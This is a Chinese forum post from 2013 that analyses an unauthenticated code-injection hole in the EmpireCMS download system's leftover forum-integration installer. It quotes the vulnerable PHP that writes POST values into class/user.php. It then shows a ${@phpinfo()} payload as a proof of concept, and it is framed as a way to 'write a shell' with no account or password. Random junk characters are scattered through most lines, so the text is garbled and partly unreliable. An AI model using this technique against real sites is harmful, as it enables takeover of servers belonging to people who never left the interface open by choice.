这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们0 r, \* F# m" ^. }# C3 ^
2 G: M" Y3 Y7 X) o( K+ J# ]/ y6 [+ o$ t4 p* \
这是帝国的一套下载系统 如图
/ v% B3 B3 A: }* o$ @ps(不需要任何账户和密码,直接写shell) / X3 Q8 `& B+ y3 B& i
由于很多站是由于下载要整合discuz 等等一些论坛....
8 W, r( t! M) g0 c
) i1 [$ i$ C3 I# K6 c7 }, Q) D而帝国他又有一个万能接口,如图 ' d9 L3 u4 w/ v3 }
5 @5 \5 Z2 u+ t& e- H$ k1 n7 Y9 V N
而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码; N. A6 U! k" o; ]8 d
+ g5 b: M( r- ?/ R9 `& \
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪) u! \3 S) o; Q3 I
. ^# u' L; g! b* v在data/fun.php中的15行6 s$ X2 T9 T/ ?
2 Y l' v0 C1 _# F
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {; e2 k9 v) C' e1 b2 K8 y
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干" P: u9 X( R/ Z8 Q% u$ _5 [" S
( h. x2 d) R0 ^9 D2 r* S3 w$ ~这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
5 v. j; i( z2 l7 h8 w5 _3 s( c7 }$ e! r3 J7 v# G
他将传进来的变量进行了切割,然后赋给了$filetext D1 r. W* F& b" \$ ?; h* w
/ d+ W( v" G9 N* c' D
然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了
/ `# q, f9 V1 D1 [# T5 p2 m5 V5 S6 r" ?$ T8 @
我们看看写入的结果,随便填一个 5 t9 f* X( G K% ?! U
% l( W' i8 E6 ]5 [) m# C& p v& n/ A, N" ]' D# w
* r2 y" ]) |3 R2 P
) Z/ Y3 {% e c
/ f9 |: ^1 d% @2 L- y3 b
! J7 L1 h+ W5 u5 i, J# v8 o, r
. n* [$ W$ L0 B9 ?7 i) \- B7 d- K9 g: L4 v6 ]$ J5 c
3 b( k% G# u" C' D5 B
. m7 w" T u! u7 M" f, f% A0 r# C" Q2 D/ J# N0 @1 I
: b; f t3 s a6 k* m, i
3 Z; ], n/ ~: S
* e; c! }- s# g6 D0 ~" j/ t; ?
s9 J' l1 \7 p" M, f, O
* R9 v: ?( ^5 h3 V" z
M, z/ @" R& z$ h: C
3 e% O/ j7 k" Y+ i* w
% D& n2 ~0 g+ V* j l9 ~# N
* \% D* @: G' @- Y8 u1 j8 E4 I2 ~# i) J7 s* X' n/ n$ H. ?/ U
所以我们淫荡点,写个${@phpinfo()}试试
0 o7 G( ?4 n0 y$ }" ~- j然后访问以下class/user.php这个文件6 ?; a9 Q# \3 I$ ]0 o6 J6 Q
日了吧 . @7 o/ { o) m3 g$ e5 f
# k4 F$ S- ^5 H! [9 s% e
* ~# T% J: d; V- J% U
! r9 F' E3 |( z% L1 |! \3 G
: _1 `8 V' A# o4 o: \( a3 H
; L. p8 _+ o! ]2 s | 
发表于 2013-1-23 09:34:37
收藏
支持
反对